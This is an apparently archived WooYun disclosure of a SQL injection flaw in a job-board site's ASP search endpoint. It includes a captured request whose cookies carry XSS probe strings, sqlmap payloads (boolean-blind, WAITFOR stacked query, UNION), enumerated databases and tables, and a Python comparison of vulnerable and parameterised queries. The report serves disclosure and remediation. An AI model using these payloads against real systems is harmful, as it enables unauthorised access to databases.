WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-10-13: Details have been sent to the vendor and are awaiting the vendor's handling
2015-10-16: The vendor has confirmed; details are disclosed to the vendor only
2015-10-26: Details disclosed to core white hats and experts in the relevant field
2015-11-05: Details disclosed to regular white hats
2015-11-15: Details disclosed to intern white hats
2015-11-30: Details disclosed to the public
As the title says.
GET /bys/freeposlistmore_dxs.asp?pagesize=3&region=*&reqtxt=&tp=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: cacheid=E%3A%5Cwebroot%5Cjxrcw2008%5Ccachefile%5C20151012969%2Edbx; ASPSESSIONIDSADQRSDD=MNDGBIEBCDAIJOMFAOOOJNEO; once%5Fsea0=2015%2F10%2F12+11%3A38%3A34%5Bs%5Dduring%3D30%26; c%5Fcounts=0; once%5Fsea1=2015%2F10%2F12+11%3A38%3A39%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; dwid=; rcid=vid=b2b7ab2daf45bbf17f00b39b68c3dbf9&id=13480735; once%5Fsea2=2015%2F10%2F12+9%3A13%3A18%5Bs%5Dduring%3D30%26hr1%3D%2C362500%2C100000%26; ASP.NET_SessionId=ct5xohmgzk2aba555ozabg45; once%5Fsea3=2015%2F10%2F12+9%3A14%3A17%5Bs%5Dduring%3D1%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea4=2015%2F10%2F12+9%3A07%3A41%5Bs%5Dduring%3D30%26; once%5Fsea5=2015%2F10%2F12+9%3A14%3A54%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%26; once%5Fsea6=2015%2F10%2F12+9%3A07%3A53%5Bs%5Dduring%3D30%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea7=2015%2F10%2F12+9%3A07%3A59%5Bs%5Dduring%3D30%26; PHPSESSID=0f07c3754e2326b636e6bdd57f0f1cb3; once%5Fsea8=2015%2F10%2F12+11%3A38%3A31%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%E5%8E%A8%E5%B8%88%26; once%5Fsea9=2015%2F10%2F12+11%3A38%3A32%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; Hm_lvt_59597c781e785574f9f3b0ff29411bb0=1444620927,1444620934,1444620940,1444621125; Hm_lpvt_59597c781e785574f9f3b0ff29411bb0=1444621125; HMVT=59597c781e785574f9f3b0ff29411bb0|1444617322|; HMACCOUNT=A045F03F2DBCE2A0; bdshare_firstime=1444617386998; BAIDUID=530654A42E45A89ADE4A3F0A3C813510:FG=1; ASPSESSIONIDQADRSRCD=IAMPMGHBLPEGAJIAGDLGHDBC; a6859_pages=1; a6859_times=1; Hm_lvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lpvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; Hm_lpvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; ASPSESSIONIDQACTTSDC=BPCHFNCBKGPNGEAEOHAJFKCN; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; kf51_userid=1444618182085_8968; kf51_referrer=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; cck_lasttime=1444618182090; cck_count=0; jxrc_dw_autowidth=1; cnzz_a31557=0; sin31557=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; rtime=0; ltime=1444620194724; cnzz_eid=17005507-1304580828-http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%28; CNZZDATA31664=cnzz_eid%3D1282555937-1444615235-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1444615235
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The region parameter is injectable.
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=%' AND 8995=8995 AND '%'='&reqtxt=&tp=2

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=%';WAITFOR DELAY '0:0:5'--&reqtxt=&tp=2

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=-9379%' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(97)+CHAR(69)+CHAR(109)+CHAR(119)+CHAR(66)+CHAR(117)+CHAR(118)+CHAR(113)+CHAR(81)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL-- &reqtxt=&tp=2
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] master
[*] model
[*] msdb
[*] newjxrc
[*] News
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: newjxrc
[10 tables]
+--------------+
| CD_INDU      |
| PosViewTimes |
| RC_INFO      |
| RESULT4DW    |
| RESULT4RC    |
| cd_educ      |
| groupPos     |
| indutj       |
| postptj      |
| wkregtj      |
+--------------+
Database: master
[359 tables]
At this point data can basically be read without obstruction; stopping here.
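An added illustration, not part of the original report, of why the region parameter was injectable and how a bound parameter closes it. It uses Python's sqlite3 as a stand-in for the SQL Server 2008 backend and assumes the query shape `... LIKE '%<input>%'` that the reported boolean-based payload implies; the rows and the function names are constructed for the demo.

```python
"""Vulnerable string-built query beside its parameterised form, driven with the
boolean-based payload sqlmap reported for the region parameter.

sqlite3 stands in for the site's SQL Server 2008; the LIKE '%...%' shape is an
assumption inferred from the payload, not taken from the site's ASP source."""
import sqlite3

# Constructed sample rows standing in for the job-posting table.
ROWS = [("Nanchang", "cook"), ("Jiujiang", "driver"), ("Ganzhou", "clerk")]

# Boolean-based payload exactly as sqlmap reported it (URL-decoded).
SQLMAP_BOOLEAN_PAYLOAD = "%' AND 8995=8995 AND '%'='"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pos (region TEXT, title TEXT)")
    conn.executemany("INSERT INTO pos VALUES (?, ?)", ROWS)
    return conn


def list_positions_vulnerable(conn, region):
    # Classic-ASP style string building: the input becomes part of the SQL text,
    # so the payload closes the quote and appends an always-true condition.
    sql = "SELECT region, title FROM pos WHERE region LIKE '%" + region + "%'"
    return conn.execute(sql).fetchall()


def list_positions_fixed(conn, region):
    # Bound parameter: the input is only ever a value, never SQL syntax.
    pattern = "%" + region + "%"
    return conn.execute(
        "SELECT region, title FROM pos WHERE region LIKE ?", (pattern,)
    ).fetchall()


def demo():
    """Run both variants with a legitimate value and with the sqlmap payload."""
    conn = make_db()
    legit = "Nanchang"
    return {
        "vuln_legit": list_positions_vulnerable(conn, legit),
        "vuln_payload": list_positions_vulnerable(conn, SQLMAP_BOOLEAN_PAYLOAD),
        "fixed_legit": list_positions_fixed(conn, legit),
        "fixed_payload": list_positions_fixed(conn, SQLMAP_BOOLEAN_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With the payload, the vulnerable query returns every row (the WHERE clause collapses to true), while the parameterised query returns nothing because the payload is matched as a literal pattern.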
Severity level: High
Vulnerability Rank: 10
Confirmed at: 2015-10-16 14:34
CNVD has confirmed and reproduced the described vulnerability; it has been forwarded to CNCERT for dispatch to the corresponding branch center, which will coordinate handling with the organization that administers the website.
None for now